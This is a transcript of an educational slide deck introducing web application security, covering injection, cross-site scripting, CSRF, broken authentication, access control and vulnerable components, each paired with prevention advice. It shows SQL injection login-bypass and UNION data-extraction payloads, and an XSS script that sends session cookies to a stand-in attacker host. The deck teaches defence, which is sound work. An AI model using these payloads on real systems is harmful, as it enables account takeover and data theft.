Web Application Security in a nutshell

7,320 views

Published on

>>> View this presentation online at http://webappsec-nutshell.kimminich.de/ <<<

An ultra-compact intro (or refresher) to Web Application Security derived from my Web Application Security Training Workshop (http://de.slideshare.net/BjrnKimminich/web-application-security-21684264).

Published in: Technology

Web Application Security in a nutshell

  1. 1. WEB APPLICATION SECURITY IN A NUTSHELL AN ULTRA-COMPACT INTRO (OR REFRESHER) TO WEB APPLICATION SECURITY Created by Björn Kimminich / @bkimminich
  2. 2. BJÖRN KIMMINICH Application Security Officer at Author of open-source pentest training webapp Kuehne + Nagel (AG & Co.) KG juice-shop OWASP OWASP Zed Attack Proxy member and contributor
  3. 3. FAMOUS LAST WORDS... “Nobody would bother to hack us.” “Our Firewall, IDS and IPS will keep us safe.” “We will add security to the system later.” “What's the worst that could actually happen?”
  4. 4. INJECTION
  5. 5. INJECTION MEANS... ...tricking an application into including unintended commands in the data sent to an interpreter.
  6. 6. INTERPRETER MEANS... ...a program that takes a String and interprets it as a command.
  7. 7. INTERPRETERS ARE USED FOR... SQL HQL OS Shell LDAP XPath ...
  8. 8. BYPASSING AUTHENTICATION WITH SQL INJECTION String query = "SELECT id FROM users " + "WHERE name = '" + req.getParameter("username") + "'" + "AND password = '" + req.getParameter("password") + "'"; The indented use case results in a query like this: SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
  9. 9. ATTACK EXAMPLES ON AUTHENTICATION QUERIES Disabling password check for a known username: SELECT id FROM users WHERE name = 'bjoern'‐‐' AND password = '?' Logging in without even knowing a username: SELECT id FROM users WHERE name = '' or 1=1‐‐' AND password = '?'
  10. 10. SPYING OUT DATA WITH SQL INJECTION String query = "SELECT id,author,title,price FROM books " + "WHERE title LIKE '%" + req.getParameter("query") + "%'"; The indented use case results in a query like this: SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
  11. 11. ATTACK EXAMPLES ON DATA RETRIEVAL QUERIES Probing for right number of result set columns: SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users‐‐%' SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users‐‐%' SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users‐‐%' Using known column names to extract data: SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users‐‐%'
  12. 12. PREVENTING INJECTION Avoid Interpreters Bind Variables Prepared Statements Least Privileges for app DB user White List Input Validation
  13. 13. CROSS SITE SCRIPTING (XSS)
  14. 14. MALICIOUS CODE IS SENT... ...to an innocent user's browser through a form field or URL (Reflected XSS) a previously stored DB record (Persistent XSS) a DOM element of a rich JS client (Local XSS)
  15. 15. POSSIBLE DAMAGE FROM XSS stolen user session stolen sensitive data rewriting web page redirecting to malicious site
  16. 16. XSS VULNERABILITY EXAMPLE http://bookwo.rm/titles/search?keywords=raspberry%20pi The indented use case is to display the keywords above the results: <% String keywords = request.getParameter("keywords"); List<Book> results = titleSearchService.findByKeywords(keywords.split(" ")); %> There are <%=results.count()%> results for your search by <em><%=keywords%></em> <table> <% for (Book book : results) { %> // render result as table rows <% } %> </table>
  17. 17. XSS ATTACK EXAMPLES Probing for XSS Vulnerability <script>alert(1)</script> Stealing User Session <script> </script> new Image().src="http://my.evil‐si.te/hijack.php?c="+encodeURI(document.cookie); Site Defacement <script>document.body.background="http://my.evil‐si.te/image.jpg";</script>
  18. 18. PREVENTING XSS Do not unnecessarily include user supplied input into output Output encode all user supplied input Sanitize HTML where user supplied HTML is unavoidable White List Input Validation
  19. 19. CROSS SITE REQUEST FORGERY (CSRF)
  20. 20. A VICTIM'S BROWSER... ...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request. Session Cookie Basic Authentication Authorization HTTP Header ...
  21. 21. CSRF ATTACK EXAMPLES
  22. 22. PREVENTING CSRF Add a secret token to all sensitive requests This token must not be automatically submitted Require secondary authentication for sensitive functions Beware exposing the token in a Referer HTTP header Make sure your application has no XSS holes that could be exploited to attack others!
  23. 23. BROKEN AUTHENTICATION
  24. 24. TYPICAL AUTHENTICATION FLAWS Allowing weak passwords Storing SSL certificate insecurely Credentials passed via insecure http connection Expose session id's in URLs, via unencrypted network, logs, ...
  25. 25. SIDE CHANNEL ATTACK VECTORS Change Password “Remember me” Forgot Password Secret Questions Make sure your application does not store credentials in its database unencrypted!
  26. 26. CLASSICAL BROKEN AUTHENTICATION... ...DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE http://sick‐cure‐ba.nk/login.do POST /login.do HTTP/1.1 Host: sick‐cure‐ba.nk Cache‐Control: no‐cache Content‐Type: application/x‐www‐form‐urlencoded username=bjoern&password=secret
  27. 27. WEAK HASHES PUT PASSWORDS AT RISK... ...AS DO UNSALTED STRONG HASH ALGORITHMS id username password 1 admin d033e22ae348aeb5660fc2140aec35850c4da997 2 bjoern 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b 3 localhorst 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe4 64e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006 Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512bit length. You can even crack password hashes online, e.g. at or via . CrackStation a tweet to @PlzCrack
  28. 28. BROKEN ACCESS CONTROL
  29. 29. COMMON AUTHORIZATION MISTAKES Hiding object references instead of restricting access Displaying only authorized links and menu choices Trusting client-side access control mechanisms Lack of server-side verification of user privileges
  30. 30. REQUEST TAMPERING FOR PRIVILEGE ESCALATION... ...AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES http://logistics‐worldwi.de/showShipment?id=40643108 http://my‐universi.ty/api/students/6503/exams/view http://document‐warehou.se/landingpage?content=index.html
  31. 31. SECURING AUTHORIZATION Never rely on “Security by obscurity” Replace direct object references with temporary mappings Restrict data and functionality access to authorized users Enforce user or role based permissions
  32. 32. BROKEN ENVIRONMENT
  33. 33. POSSIBLE ENVIRONMENTAL VULNERABILITIES Software Libraries Application Server Web Server Operating System ...
  34. 34. KNOWN VULNERABILITY EXAMPLES Component Vulnerability Affected OpenSSL Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read ( ) 1.0.1 - 1.0.1f, 1.0.2- beta, 1.0.2-beta1 Unix Bash Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system ( ) CGI, OpenSSH, DHCP, QMail, ... Struts Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method before 2.3.16.1 Struts Wildcard cookiesName not properly restricts access to the getClass() method, which allows ClassLoader manipulation before 2.3.16.2 Heartbleed Shellshock
  35. 35. PROTECTION FROM ENVIRONMENTAL VULNERABILITIES Monitor security of used components Keep up with patches for used components Remove unnecessary stuff on all levels Restrict use of unapproved components Java and .NET project dependencies can be monitored by which relies on the OWASP Dependency Check NIST . For Javascript and Node.js modules there is which is updated manually National Vulnerability Database Retire.js via its GitHub project . Both tools integrate well with typical software build processes.
  36. 36. Q&A
  37. 37. CREDITS Presentation created with reveal.js The HTML Presentation Framework Based on free material provided by OWASP The Open Web Application Security Project Background image based on Digital Shodan by sephiroth-kmfdm
  38. 38. THE END BY BJÖRN KIMMINICH / KIMMINICH.DE These slides are publicly available on GitHub and Slideshare.

×